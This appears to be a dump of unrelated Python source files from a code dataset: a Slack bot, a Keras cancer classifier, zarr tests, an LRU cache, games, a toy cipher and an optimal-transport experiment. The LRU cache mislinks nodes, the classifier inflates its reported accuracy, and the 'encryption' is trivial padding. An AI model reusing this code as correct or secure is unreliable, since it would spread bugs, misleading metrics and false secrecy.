print('error'+str(pageNumber)+'저장에러')\n print(str(pageNumber)+\"완료\") \n return doct \n\ndef get_tags(text, ntags=50):\n spliter = Twitter()\n # konlpy의 Twitter객체\n nouns = spliter.nouns(text)\n # nouns 함수를 통해서 text에서 명사만 분리/추출\n count = Counter(nouns)\n # Counter객체를 생성하고 참조변수 nouns할당\n return_list = [] # 명사 빈도수 저장할 변수\n for n, c in count.most_common(ntags):\n if len(n)>1:\n temp = {'tag': n, 'count': c}\n return_list.append(temp)\n # most_common 메소드는 정수를 입력받아 객체 안의 명사중 빈도수\n # 큰 명사부터 순서대로 입력받은 정수 갯수만큼 저장되어있는 객체 반환\n # 명사와 사용된 갯수를 return_list에 저장합니다.\n return return_list \n \ndef main(ch):\n print('main in')\n text_file_name = \"mlbpark.txt\"\n noun_count = 15\n cc = [1,2,3,4,5,6,7,8,9,10,11,12]\n pool=Pool(processes=4)\n print('pool in')\n doc=pool.map(mlbparkCrawl,cc)\n pool.close()\n print('end pool') \n output_file_name = \"mlbparkcount.txt\"\n slack.api_call(\n \"chat.postMessage\",\n channel=ch,\n text='다 됐어요. 검색결과 입니다',\n as_user='true'\n )\n try:\n open_output_file = open(text_file_name, 'w',-1,\"utf-8\")\n docstr = ''.join(str(doc))\n docs=docstr.replace(' ','')\n open_output_file.write(docs)\n open_output_file.close()\n open_text_file = open(text_file_name, 'r',-1,\"utf-8\")\n # 분석할 파일을 open \n text = open_text_file.read() #파일을 읽습니다. \n tags = get_tags(text, noun_count) # get_tags 함수 실행\n open_text_file.close() #파일 close R\n open_output_file = open(output_file_name, 'w',-1,\"utf-8\")\n # 결과로 쓰일 count.txt 열기\n msg = []\n x=[]\n y=[]\n for tag in tags:\n noun = tag['tag']\n count = tag['count']\n x.append(noun)\n y.append(count)\n msg.append(noun+' '+str(count))\n open_output_file.write('{} {}\\n'.format(noun, count)) \n open_output_file.close() \n print(msg) \n plt.bar(x,y,label='test')\n # plt.show\n plt.savefig('test.png')\n with open('test.png', 'rb') as f:\n slack.api_call(\n \"files.upload\",\n channels=ch,\n filename='sample.mp4',\n title='검색결과', \n file=f,\n as_user='true'\n )\n return msg\n except:\n print('error 쓰기에러')\n return 'error'\n\ndef slacksend(ch):\n msg = main(ch)\n # textmsg = ''\n # for i in msg:\n # textmsg+=str(i)+'\\n'\n # # print(msg) \n # slack.api_call(\n # \"chat.postMessage\",\n # channel=ch,\n # text=textmsg,\n # as_user='true'\n # )\n return\ndef sendmsg(ch,msg):\n if msg == '엠팍':\n rand=['MLBPARK 이슈를 알려드릴게요','현재 엠팍의 이슈는요 잠시만요','맨날 이거만시키네'] \n slack.api_call(\n \"chat.postMessage\",\n channel=ch,\n text=rand,\n as_user='true'\n )\n elif msg == '유리나':\n rand=['저 부르셨어요?','저요?','저 왜요?','저를 언급하셨네요']\n slack.api_call(\n \"chat.postMessage\",\n channel=ch,\n text=random.choice(rand),\n as_user='true'\n )\n elif msg == '사망':\n slack.api_call(\n \"chat.postMessage\",\n channel=ch,\n text='유리나님이 사망하셨습니다. 곧 다시 태어납니다',\n as_user='true'\n )\n elif msg == '입장':\n rand = ['유리나가 왔어요~','Im back!','저 살아왔어요 ㅠㅠ','유리나 입장!']\n slack.api_call(\n \"chat.postMessage\",\n channel=ch,\n text=random.choice(rand),\n as_user='true'\n )\n elif msg == 'ㅋㅋ':\n rand = ['ㅋㅋ','ㅎㅎ','ㅋㅋㅋㅋㅋ','히히','ㅎㅎㅎㅎ']\n slack.api_call(\n \"chat.postMessage\",\n channel=ch,\n text=random.choice(rand),\n as_user='true'\n )\n elif msg == '명령어':\n rand = (\"유리나의 명령어: '엠팍','ㅋ','ㅎ','유리나','명령어'\")\n slack.api_call(\n \"chat.postMessage\",\n channel=ch,\n text=rand,\n as_user='true'\n ) \nif __name__ == '__main__': \n token = os.environ['slacktoken']#custom\n slack = SlackClient(token)\n bot_name = \"yurinabot\"\n bot_id=''\n api_call = slack.api_call(\"users.list\")\n if api_call.get('ok'):\n # retrieve all users so we can find our bot\n users = api_call.get('members')\n for user in users:\n if 'name' in user and user.get('name') == bot_name:\n bot_id=user.get('id')\n\n while True:\n try:\n if slack.rtm_connect(with_team_state=False):\n sendmsg('general','입장')\n while True:\n msg=slack.rtm_read() \n if len(msg) > 0: \n for i in msg:\n iText=str(i.get('text'))\n if i.get('user') !='U8S35RTPT' and i.get('user') != 'U8TUV60JE':\n if(iText == '엠팍'):\n sendmsg(i.get('channel'),'엠팍')\n slacksend(i.get('channel'))\n elif '유리나' in iText and i.get('user'):\n if '명령어' in iText:\n sendmsg(i.get('channel'),'명령어')\n else:\n sendmsg(i.get('channel'),'유리나')\n elif ('ㅋ' in iText or 'ㅎ' in iText )and i.get('user') != bot_id:\n sendmsg(i.get('channel'),'ㅋㅋ') \n del msg[:] \n # del doc[:]\n time.sleep(2) \n else:\n print(\"Connection Failed\") \n except :\n sendmsg('general','사망') ","sub_path":"yurina.py","file_name":"yurina.py","file_ext":"py","file_size_in_byte":8441,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"96"} +{"seq_id":"563274993","text":"import os\nfrom keras.models import Sequential\nfrom keras.layers import Dense\nfrom keras import regularizers\nfrom sklearn.model_selection import StratifiedKFold\n# from sklearn.metrics import roc_curve\n# from sklearn.metrics import auc\n# from sklearn.ensemble import RandomForestClassifier\n#import matplotlib.pyplot as plt\nimport numpy\n\n\ndef main():\n \"\"\"Creates 3 layer neural network and trains/evaluates on cancer data.\"\"\"\n\n numpy.random.seed(7)\n\n # get complete data set\n filename = os.path.join(os.getcwd(), 'Data\\\\detect a\\\\Only Numbers (normal).csv')\n total_data = numpy.loadtxt(filename, delimiter=\",\")\n\n # randomly split data into train, validation, test\n #trainData, validationData, testData = getData(filename, 0.1, 0.2, False)\n\n # filename = os.path.join(os.getcwd(), '..', 'Data/detect a/Training Data.csv' )\n # trainData = numpy.loadtxt(filename, delimiter=\",\")\n # filename = os.path.join(os.getcwd(), '..', 'Data/detect a/Test Data.csv')\n # testData = numpy.loadtxt(filename, delimiter=\",\")\n\n # data, result, type, gender is in column 41\n total = [total_data[:, 0:40], total_data[:, 41], total_data[:, 42]]\n\n # define 10-fold cross validation\n kfold = StratifiedKFold(n_splits=10, shuffle=True, random_state=7)\n\n # create file to write in\n filename = os.path.join(os.getcwd(),'Data\\\\detect a\\\\CrossValidation\\\\results.csv')\n file = open(filename, 'w')\n\n regularizer = [0, 0.0005, 150, 0.96] # first two are regularization\n #coefficients, epochs, threshold\n\n average = 0\n false_positive = 0\n for train, test in kfold.split(total[0], total[1]):\n model = Sequential()\n model.add(Dense(30, input_dim=40,\n kernel_regularizer=regularizers.l2(regularizer[0]),\n activation='relu'))\n model.add(Dense(25, kernel_regularizer=regularizers.l2(regularizer[1]),\n activation='relu'))\n model.add(Dense(1, activation='sigmoid'))\n\n model.compile(loss='binary_crossentropy',\n optimizer='adam', metrics=['accuracy'])\n # class_weight makes false negatives less desirable\n model.fit(total[0][train], total[1][train], class_weight={0: 1, 1: 1},\n epochs=regularizer[2], batch_size=32, verbose=0)\n\n accuracy = model.evaluate(total[0][train], total[1][train], verbose=0)\n print(\"train: \" + str(accuracy[1]*100))\n accuracy = model.evaluate(total[0][test], total[1][test], verbose=0)\n print(\"total: \" + str(accuracy[1]*100))\n\n # calculate prediction\n predictions = model.predict(total[0][test])\n\n # roc\n\n # y_pred_keras = predictions.ravel()\n # fpr, tpr, thresholds = roc_curve(total[1][test], y_pred_keras)\n # aucKeras = auc(fpr, tpr)\n # print(aucKeras)\n # plt.figure(1)\n # plt.plot([0, 1], [0, 1], 'k--')\n # plt.plot(fpr, tpr, label='Keras (area = {:.3f})'.format(aucKeras))\n # plt.xlabel('False positive rate')\n # plt.ylabel('True positive rate')\n # plt.title('ROC curve')\n # plt.legend(loc='best')\n # plt.show()\n # # Zoom in view of the upper left corner.\n # plt.figure(2)\n # plt.xlim(0, 0.01)\n # plt.ylim(0.70, 0.85)\n # plt.plot([0, 1], [0, 1], 'k--')\n # plt.plot(fpr, tpr, label='Keras (area = {:.3f})'.format(auc))\n # plt.xlabel('False positive rate')\n # plt.ylabel('True positive rate')\n # plt.title('ROC curve (zoomed in at top left)')\n # plt.legend(loc='best')\n # plt.show()\n\n predictions = predictions.tolist()\n # round predictions\n rounded = []\n for prediction in predictions:\n if prediction[0] >= regularizer[3]:\n rounded.append(1)\n else:\n rounded.append(0)\n\n # add cancer types\n types = total[2][test]\n\n # add real cancer value\n real = total[1][test]\n # change to add cancer type\n temp_positive = 0\n accuracy = 0\n for count, value in enumerate(rounded):\n if real[count] == 0 and value != 0:\n temp_positive += 1\n elif real[count] == value:\n accuracy += 1\n line = str(real[count]) + \",\" + \\\n str(value) + \",\" + str(types[count])\n file.write(line + \"\\n\")\n print(\"false negatives: \" + str(temp_positive))\n accuracy /= len(rounded)\n print(\"real accuracy: \" + str(accuracy) + \"\\n\")\n average += accuracy\n false_positive += temp_positive\n\n file.close()\n print()\n print('The accuracy of the model is '+str((average*10)+10)+'%')\n print('False negatives:',false_positive)\n print('Total number of datasets',len(total_data))\nmain()","sub_path":"Code/AccurateDetect.py","file_name":"AccurateDetect.py","file_ext":"py","file_size_in_byte":4826,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"96"} +{"seq_id":"165390531","text":"from django.conf.urls import patterns, include, url\nfrom django.contrib.staticfiles.urls import staticfiles_urlpatterns\nfrom django.contrib import admin\n\nfrom .settings import MEDIA_ROOT, DEBUG\n\nadmin.autodiscover()\n\nurlpatterns = patterns(\n '',\n url(r'^$', 'apps.hello.views.home', name='home'),\n\n url(r'^requests/$', 'apps.request.views.request_store',\n name='requests'),\n\n url(r'^edit/$', 'apps.hello.views.edit', name='user_detail'),\n\n url(r'^login/$', 'django.contrib.auth.views.login',\n {'template_name': 'login.html'}, name='login'),\n\n url(r'^logout/$', 'django.contrib.auth.views.logout',\n {'next_page': '/'}, name='logout'),\n\n url(r'^admin/', include(admin.site.urls)),\n)\nurlpatterns += staticfiles_urlpatterns()\n\nif DEBUG:\n urlpatterns += patterns('',\n url(r'^uploads/(?P.*)$',\n 'django.views.static.serve',\n {'document_root': MEDIA_ROOT}))\n","sub_path":"fortytwo_test_task/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":991,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"96"} +{"seq_id":"647093196","text":"# -*- coding: utf-8 -*-\nfrom __future__ import absolute_import, print_function, division\nfrom tempfile import mkdtemp\nimport atexit\nimport json\nimport shutil\nfrom multiprocessing.pool import ThreadPool\nfrom multiprocessing import Pool as ProcessPool\nfrom multiprocessing import cpu_count\nimport tempfile\nimport traceback\nimport sys\n\n\nimport numpy as np\nfrom nose.tools import eq_ as eq, assert_is_instance\nfrom numpy.testing import assert_array_equal\n\n\nfrom zarr.tests.test_attrs import TestAttributes\nfrom zarr.tests.test_core import TestArray\nfrom zarr.tests.test_hierarchy import TestGroup\nfrom zarr.sync import ThreadSynchronizer, ProcessSynchronizer\nfrom zarr.core import Array\nfrom zarr.attrs import Attributes\nfrom zarr.storage import init_array, DirectoryStore, init_group, atexit_rmtree\nfrom zarr.compat import PY2\nfrom zarr.codecs import Zlib\nfrom zarr.hierarchy import Group\n\n\nclass TestAttributesWithThreadSynchronizer(TestAttributes):\n\n def init_attributes(self, store, read_only=False):\n key = 'attrs'\n store[key] = json.dumps(dict()).encode('ascii')\n synchronizer = ThreadSynchronizer()\n return Attributes(store, synchronizer=synchronizer, key=key,\n read_only=read_only)\n\n\nclass TestAttributesProcessSynchronizer(TestAttributes):\n\n def init_attributes(self, store, read_only=False):\n key = 'attrs'\n store[key] = json.dumps(dict()).encode('ascii')\n sync_path = mkdtemp()\n atexit.register(shutil.rmtree, sync_path)\n synchronizer = ProcessSynchronizer(sync_path)\n return Attributes(store, synchronizer=synchronizer, key=key,\n read_only=read_only)\n\n\ndef _append(arg):\n z, i = arg\n import numpy as np\n x = np.empty(1000, dtype='i4')\n x[:] = i\n shape = z.append(x)\n return shape\n\n\ndef _set_arange(arg):\n z, i = arg\n import numpy as np\n x = np.arange(i*1000, (i*1000)+1000, 1)\n z[i*1000:(i*1000)+1000] = x\n return i\n\n\nclass MixinArraySyncTests(object):\n\n def test_parallel_setitem(self):\n n = 100\n\n # setup\n arr = self.create_array(shape=n * 1000, chunks=999, dtype='i4')\n arr[:] = 0\n pool = self.create_pool()\n\n # parallel setitem\n results = pool.map(_set_arange, zip([arr] * n, range(n)), chunksize=1)\n results = sorted(results)\n\n print(results)\n eq(list(range(n)), results)\n assert_array_equal(np.arange(n * 1000), arr[:])\n\n pool.terminate()\n\n def test_parallel_append(self):\n n = 100\n\n # setup\n arr = self.create_array(shape=1000, chunks=999, dtype='i4')\n arr[:] = 0\n pool = self.create_pool()\n\n # parallel append\n results = pool.map(_append, zip([arr] * n, range(n)), chunksize=1)\n results = sorted(results)\n\n print(results)\n eq([((i+2)*1000,) for i in range(n)], results)\n eq(((n+1)*1000,), arr.shape)\n\n pool.terminate()\n\n\nclass TestArrayWithThreadSynchronizer(TestArray, MixinArraySyncTests):\n\n def create_array(self, read_only=False, **kwargs):\n store = dict()\n init_array(store, **kwargs)\n return Array(store, synchronizer=ThreadSynchronizer(),\n read_only=read_only)\n\n def test_repr(self):\n if not PY2:\n\n z = self.create_array(shape=100, chunks=10, dtype='f4',\n compressor=Zlib(1))\n # flake8: noqa\n expect = \"\"\"Array((100,), float32, chunks=(10,), order=C)\n nbytes: 400; nbytes_stored: 245; ratio: 1.6; initialized: 0/10\n compressor: Zlib(level=1)\n store: dict; synchronizer: ThreadSynchronizer\n\"\"\"\n actual = repr(z)\n for l1, l2 in zip(expect.split('\\n'), actual.split('\\n')):\n eq(l1, l2)\n\n def create_pool(self):\n pool = ThreadPool(cpu_count())\n return pool\n\n\nclass TestArrayWithProcessSynchronizer(TestArray, MixinArraySyncTests):\n\n def create_array(self, read_only=False, **kwargs):\n path = tempfile.mkdtemp()\n atexit.register(atexit_rmtree, path)\n store = DirectoryStore(path)\n init_array(store, **kwargs)\n sync_path = tempfile.mkdtemp()\n atexit.register(atexit_rmtree, sync_path)\n synchronizer = ProcessSynchronizer(sync_path)\n return Array(store, synchronizer=synchronizer,\n read_only=read_only, cache_metadata=False)\n\n def test_repr(self):\n if not PY2:\n\n z = self.create_array(shape=100, chunks=10, dtype='f4',\n compressor=Zlib(1))\n # flake8: noqa\n expect = \"\"\"Array((100,), float32, chunks=(10,), order=C)\n nbytes: 400; nbytes_stored: 245; ratio: 1.6; initialized: 0/10\n compressor: Zlib(level=1)\n store: DirectoryStore; synchronizer: ProcessSynchronizer\n\"\"\"\n actual = repr(z)\n for l1, l2 in zip(expect.split('\\n'), actual.split('\\n')):\n eq(l1, l2)\n\n def create_pool(self):\n pool = ProcessPool(processes=cpu_count())\n return pool\n\n\ndef _create_group(arg):\n g, name = arg\n h = g.create_group(name)\n return h.name\n\n\ndef _require_group(arg):\n g, name = arg\n h = g.require_group(name)\n return h.name\n\n\nclass MixinGroupSyncTests(object):\n\n def test_parallel_create_group(self):\n\n # setup\n g = self.create_group()\n pool = self.create_pool()\n\n # parallel create group\n n = 100\n results = pool.map(\n _create_group,\n zip([g] * n, [str(i) for i in range(n)]),\n chunksize=1\n )\n results = sorted(results)\n pool.close()\n pool.terminate()\n\n print(results)\n eq(n, len(g))\n\n pool.terminate()\n\n def test_parallel_require_group(self):\n\n # setup\n g = self.create_group()\n pool = self.create_pool()\n\n # parallel require group\n n = 100\n results = pool.map(\n _require_group,\n zip([g] * n, [str(i//10) for i in range(n)]),\n chunksize=1\n )\n results = sorted(results)\n pool.close()\n pool.terminate()\n\n print(results)\n eq(n//10, len(g))\n\n pool.terminate()\n\n\nclass TestGroupWithThreadSynchronizer(TestGroup, MixinGroupSyncTests):\n\n def create_group(self, store=None, path=None, read_only=False,\n chunk_store=None, synchronizer=None):\n if store is None:\n store, chunk_store = self.create_store()\n init_group(store, path=path, chunk_store=chunk_store)\n synchronizer = ThreadSynchronizer()\n g = Group(store, path=path, read_only=read_only,\n chunk_store=chunk_store, synchronizer=synchronizer)\n return g\n\n def create_pool(self):\n pool = ThreadPool(cpu_count())\n return pool\n\n def test_group_repr(self):\n if not PY2:\n g = self.create_group()\n expect = 'Group(/, 0)\\n' \\\n ' store: dict; synchronizer: ThreadSynchronizer'\n actual = repr(g)\n for l1, l2 in zip(expect.split('\\n'), actual.split('\\n')):\n eq(l1, l2)\n\n def test_synchronizer_property(self):\n g = self.create_group()\n assert_is_instance(g.synchronizer, ThreadSynchronizer)\n\n\nclass TestGroupWithProcessSynchronizer(TestGroup, MixinGroupSyncTests):\n\n def create_store(self):\n path = tempfile.mkdtemp()\n atexit.register(atexit_rmtree, path)\n store = DirectoryStore(path)\n return store, None\n\n def create_group(self, store=None, path=None, read_only=False,\n chunk_store=None, synchronizer=None):\n if store is None:\n store, chunk_store = self.create_store()\n init_group(store, path=path, chunk_store=chunk_store)\n sync_path = tempfile.mkdtemp()\n atexit.register(atexit_rmtree, sync_path)\n synchronizer = ProcessSynchronizer(sync_path)\n g = Group(store, path=path, read_only=read_only,\n synchronizer=synchronizer, chunk_store=chunk_store)\n return g\n\n def create_pool(self):\n pool = ProcessPool(processes=cpu_count())\n return pool\n\n def test_group_repr(self):\n if not PY2:\n g = self.create_group()\n expect = 'Group(/, 0)\\n' \\\n ' store: DirectoryStore; synchronizer: ProcessSynchronizer'\n actual = repr(g)\n for l1, l2 in zip(expect.split('\\n'), actual.split('\\n')):\n eq(l1, l2)\n\n def test_synchronizer_property(self):\n g = self.create_group()\n assert_is_instance(g.synchronizer, ProcessSynchronizer)\n","sub_path":"zarr/tests/test_sync.py","file_name":"test_sync.py","file_ext":"py","file_size_in_byte":8702,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"96"} +{"seq_id":"184011090","text":"from doubly_linked_list import DoublyLinkedList\n\nclass LRUCache:\n \"\"\"\n Our LRUCache class keeps track of the max number of nodes it\n can hold, the current number of nodes it is holding, a doubly-\n linked list that holds the key-value entries in the correct\n order, as well as a storage dict that provides fast access\n to every node stored in the cache.\n \"\"\"\n def __init__(self, limit=10):\n\n # max number of nodes it can hold\n self.limit = limit\n # current number of nodes it holding\n self.current = 0 \n\n # doubly linked list that holds entries in order\n self.order = DoublyLinkedList()\n\n # storage dict\n self.storage = {}\n\n\n \"\"\"\n Retrieves the value associated with the given key. Also\n needs to move the key-value pair to the end of the order\n such that the pair is considered most-recently used.\n Returns the value associated with the key or None if the\n key-value pair doesn't exist in the cache.\n \"\"\"\n def get(self, key):\n\n # check if key is in {}\n if key in self.storage:\n # if yes, then move the key to front\n # in this case, the node is the value attached to the key\n node = self.storage[key]\n self.order.move_to_front(node)\n # return only the value associated with the key\n return node.value[1]\n else:\n return None\n\n\n \"\"\"\n Adds the given key-value pair to the cache. The newly-\n added pair should be considered the most-recently used\n entry in the cache. If the cache is already at max capacity\n before this entry is added, then the oldest entry in the\n cache needs to be removed to make room. Additionally, in the\n case that the key already exists in the cache, we simply\n want to overwrite the old value associated with the key with\n the newly-specified value.\n \"\"\"\n def set(self, key, value):\n\n # if key exists, overwrite\n if key in self.storage:\n # we need value and node to update\n # update dict, set to new value\n # note: each key is associated with a key-value pair\n node = self.storage[key]\n node.value = (key, value)\n # put at head of the DLL\n self.order.move_to_end(node) \n return \n\n # if max capacity, drop oldest entry before adding\n elif self.current == self.limit:\n # delete oldest key value pair in {} first with the key\n del self.storage[self.order.head.value[0]]\n # remove tail from DLL \n self.order.remove_from_head()\n self.current -= 1\n \n # add to the cache - add to dict and nodes/DLL\n # add to dict \n self.storage[key] = self.order.tail\n # add to nodes\n self.order.add_to_tail((key, value))\n # update counter\n self.current += 1","sub_path":"lru_cache/lru_cache.py","file_name":"lru_cache.py","file_ext":"py","file_size_in_byte":2918,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"96"} +{"seq_id":"78126955","text":"import random\n\nmax_guess = 10\n\ndef getSecretNumber():\n return str(random.randint(100,1000000))\n\ndef getClues(guess,secretNum):\n if int(guess) == int(secretNum):\n return 'you win'\n\n clues = []\n for i in range(len(guess)):\n if guess[i] in secretNum:\n if guess[i] == secretNum[i]:\n clues.append('Fermi')\n else:\n clues.append('Pico')\n else:\n clues.append('Bagels')\n\n return ' '.join(clues)\n\nprint('Welcome Bagels')\n\nsecertNumber = ''\ndef origin():\n global secertNumber\n secertNumber = getSecretNumber()\n print('the number you have to guess is ',len(secertNumber))\n\ndef getPlayerMove():\n\n def isDigit(num):\n global secertNumber\n if num == '':\n return False\n\n if len(num) != len(secertNumber):\n print('wrong length')\n return False\n\n for i in num:\n if i not in '0 1 2 3 4 5 6 7 8 9'.split():\n return False\n\n return True\n\n move = ''\n while not isDigit(move):\n move = str(input())\n return move\n\ndef playAgain():\n print('Do you want to play again y/n')\n if input().lower().startswith('y'):\n return True\n else:\n return False\n\ndef OnGame():\n global secertNumber\n\n origin()\n\n onGame = True\n while onGame:\n for i in range(max_guess):\n print('Guess ###:')\n guess = getPlayerMove()\n content = getClues(guess,secertNumber)\n if content == 'you win':\n print(content)\n break\n else:\n print(content)\n if playAgain():\n origin()\n else:\n onGame = False\n\nOnGame()","sub_path":"Python For Leisure/EasyGame/Bagels.py","file_name":"Bagels.py","file_ext":"py","file_size_in_byte":1736,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"96"} +{"seq_id":"203010205","text":"# -------------------------------------------------------------------------------\n# Name: 005 Simple encrypt/decrypt method\n# Purpose: Take a simple message and hide it in scrambled text\n#\n# Author: Douglas Green\n#\n# Created: 4/1/2017\n# Copyright: (c) Douglas Green 2017\n# Licence: GPL 2.0\n# -------------------------------------------------------------------------------\nimport string\nimport random\n\n\ndef usr_input():\n\t\"\"\"\nGets the appropriate information form the user\n:return: none\n\"\"\"\n\ttry:\n\t\tmsg = input('Type your secret message here:')\n\t\toff = int(input('choose and offset, type a positive number here:'))\n\t\tfill = int(input('How many filling characters would you like to use:'))\n\t\tencrypter(off, fill, msg)\n\texcept TypeError:\n\t\tprint('Unknown characters please try again')\n\t\tusr_input()\n\texcept ValueError:\n\t\tprint('Unknown characters please try again')\n\t\tusr_input()\n\n\ndef ch_decrypt():\n\ttry:\n\t\toffset = int(input('What is the offset for the message?'))\n\t\tfill = int(input('What is the fill setting'))\n\t\tmsg = input('What is the encrypted message?')\n\t\tdecrypter(offset, fill, msg)\n\texcept TypeError:\n\t\tprint('Incorrect input please start over')\n\t\tch_decrypt()\n\texcept ValueError:\n\t\tprint('Incorrect input please start over')\n\t\tch_decrypt()\n\n\ndef choice():\n\tch1 = input('To encrypt type \"1\" to decrypt type \"2\"')\n\tif ch1 == \"1\":\n\t\tusr_input()\n\telif ch1 == \"2\":\n\t\tch_decrypt()\n\telse:\n\t\tprint('Incorrect input try again')\n\t\tchoice()\n\n\ndef encrypter(offset, fill, message):\n\t\"\"\"\nEncrypts the message and prints the encrypted form to the console.\n:param offset: int\n:param fill: int\n:param message: string\n:return: none\n\"\"\"\n\tout_str = \"\"\n\t# Add offset characters\n\tout_str += randomizer(offset)\n\tfor x in message:\n\t\t# for each character insert filler characters in between\n\t\tout_str += x + randomizer(fill)\n\tprint(out_str)\n\n\ndef decrypter(offset, fill, message):\n\t\"\"\"\ndecrypts a super secret message\n:param offset: int\n:param fill: int\n:param message: string\n:return: none\n\"\"\"\n\t# Use the string functions to decrypt the message\n\tprint(message[offset:len(message):(fill + 1)])\n\n\ndef randomizer(number):\n\t\"\"\"\nReturns string of random characters\n:param number: int\n:return: string\n\"\"\"\n\tx = number\n\ty = \"\"\n\t# How many randomised letters do we need\n\twhile x > 0:\n\t\t# From the range of letters digits and spaces select one\n\t\ty += random.choice(string.ascii_letters + string.digits + string.punctuation + \" \")\n\t\tx -= 1\n\treturn y\n\n\nif __name__ == '__main__':\n\t# Start the program\n\tchoice()\n","sub_path":"005/005 Simple en-de crypt.py","file_name":"005 Simple en-de crypt.py","file_ext":"py","file_size_in_byte":2517,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"632046438","text":"import os, sys\nsys.path.append(os.getcwd())\n\nimport numpy as np\nimport tensorflow as tf\nfrom ff_nets import ff_net\nimport time\n\n# Specifying problem parameters\nN_RUNS = 10 # number of identical experiment runs\nBATCH_THETA = 2 ** 7\nBATCH_MU = 2 ** 7\n\nN = 20000 # total number of training steps for generator\nN_REPORT = 100\nN_SAMPS_TOTAL = 20000 # number of samples generated\nSAVE_VALUES = 1 # if 0, then no values are saved\nN_inf = 1 # number of infimum steps for each generator step; set to either 1 or 10 for values in the paper\nN_r = 1000\nN_s = 200 # warm up phase for generator without infimum steps. Otherwise, particularly if many infimum steps are\n# used, the generator sometimes gets stuck at very concentrated and bad measures. Algorithmically, this should be\n# regarded as an extended initialization for the weights of the generator.\n\n# network architecture\nLAYERS_H = 4\nHIDDEN_H = 64\nLAYERS_T = 4\nHIDDEN_T = 64\nACT_T = 'tanh'\nACT_H = 'ReLu'\n\n\n# specifying the measures mu, theta and kappa, and the objective function f\ndef sample_mu(batch_size):\n while 1:\n dataset = np.random.normal(0, 2, [batch_size, 2])\n yield dataset\n\n\ndef sample_kappa(batch_size):\n while 1:\n yield np.random.standard_t(8, [batch_size, 1])\n\n\ndef sample_theta(batch_size):\n while 1:\n yield np.random.uniform(-1, 1, [batch_size, 2])\n\n\ndef f_objective(u):\n return tf.nn.relu(tf.reduce_sum(u, axis=1))\n\n\n# build tensorflow graph\nfor run_K in range(N_RUNS):\n t0 = time.time()\n tf.reset_default_graph()\n\n x_mu = tf.placeholder(shape=[None, 2], dtype=tf.float32) # samples from mu\n x_theta = tf.placeholder(shape=[None, 2], dtype=tf.float32) # samples from theta\n x_kappa = tf.placeholder(shape=[None, 1], dtype=tf.float32) # samples from kappa\n\n T_theta = ff_net(x_theta, 'T', input_dim=2, output_dim=2, activation=ACT_T, n_layers=LAYERS_T, hidden_dim=HIDDEN_T)\n\n h_mu = 0 # sum over h evaluated at samples of mu\n h_T_theta = 0 # sum over h evaluated at samples of theta\n for i in range(2):\n h_mu += ff_net(x_mu[:, i:(i + 1)], 'h_' + str(i), input_dim=1, output_dim=1, activation=ACT_H,\n n_layers=LAYERS_H, hidden_dim=HIDDEN_H)\n h_T_theta += ff_net(T_theta[:, i:(i + 1)], 'h_' + str(i), input_dim=1, output_dim=1, activation=ACT_H,\n n_layers=LAYERS_H, hidden_dim=HIDDEN_H)\n\n h_kappa_mu = ff_net(x_kappa, 'h_kappa', input_dim=1, output_dim=1, activation=ACT_H, n_layers=LAYERS_H,\n hidden_dim=HIDDEN_H)\n h_kappa_T_theta = ff_net(T_theta[:, 0:1] - T_theta[:, 1:2], 'h_kappa', input_dim=1, output_dim=1,\n activation=ACT_H, n_layers=LAYERS_H, hidden_dim=HIDDEN_H)\n\n obj = tf.reduce_mean(f_objective(T_theta)) - tf.reduce_mean(h_T_theta) + tf.reduce_mean(h_mu) - tf.reduce_mean(\n h_kappa_T_theta) + tf.reduce_mean(h_kappa_mu)\n\n T_vars = [v for v in tf.compat.v1.global_variables() if ('T' in v.name)]\n h_vars = [v for v in tf.compat.v1.global_variables() if ('h' in v.name)]\n\n train_op_h = tf.compat.v1.train.AdamOptimizer(learning_rate=0.0001, beta1=0.5, beta2=0.9, epsilon=1e-08).minimize(\n obj, var_list=h_vars)\n train_op_T = tf.compat.v1.train.AdamOptimizer(learning_rate=0.0001, beta1=0.5, beta2=0.9, epsilon=1e-08).minimize(\n -obj, var_list=T_vars)\n\n # training and saving values\n objective_values = []\n samp_mu = sample_mu(BATCH_MU)\n samp_theta = sample_theta(BATCH_THETA)\n samp_kappa = sample_kappa(BATCH_MU)\n with tf.compat.v1.Session() as sess:\n sess.run(tf.compat.v1.global_variables_initializer())\n for i in range(1, N + 1):\n for _ in range(N_inf):\n if i > N_s:\n s_mus = next(samp_mu)\n s_theta = next(samp_theta)\n s_kappa = next(samp_kappa)\n (_,) = sess.run([train_op_h], feed_dict={x_mu: s_mus, x_theta: s_theta, x_kappa: s_kappa})\n s_mus = next(samp_mu)\n s_theta = next(samp_theta)\n s_kappa = next(samp_kappa)\n (_, ov) = sess.run([train_op_T, obj], feed_dict={x_mu: s_mus, x_theta: s_theta, x_kappa: s_kappa})\n objective_values.append(ov)\n if i % N_REPORT == 0:\n print(i, 'objective value = ' + str(np.mean(objective_values[-N_r:])))\n print('runtime: ' + str(time.time() - t0))\n print('final objective value = ' + str(np.mean(objective_values[-N_r:])))\n print('total runtime for this run: ' + str(time.time() - t0))\n\n if SAVE_VALUES == 1:\n np.savetxt('output/objective_values_base' + str(N_inf) + '_' + str(run_K), objective_values)\n","sub_path":"dcot/base_case.py","file_name":"base_case.py","file_ext":"py","file_size_in_byte":4713,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"598446439","text":"# Web API for Lozinke\n# by Stefan Midjich \n# Part of the Lozinke project. See LICENSE file for copyright. \n# See README.md for details.\n\nfrom __future__ import print_function\n\nfrom datetime import datetime\nfrom json import dumps, loads, JSONEncoder\nfrom ConfigParser import ConfigParser\nfrom uuid import uuid4, UUID\n\nimport psycopg2, psycopg2.extras\nfrom bottle import get, post, route, run, request, response, default_app, debug, hook\nfrom keep import KeepAss, Category, Entry, Encrypt\n\nconfig = ConfigParser()\nconfig.readfp(open('keep.cfg'))\nconfig.read(['keep_local.cfg'])\n\n# TODO: This could probably be used to decrypt bytea fields too if they were \n# stored in a special type. \nclass LozEncoder(JSONEncoder):\n def default(self, obj):\n if 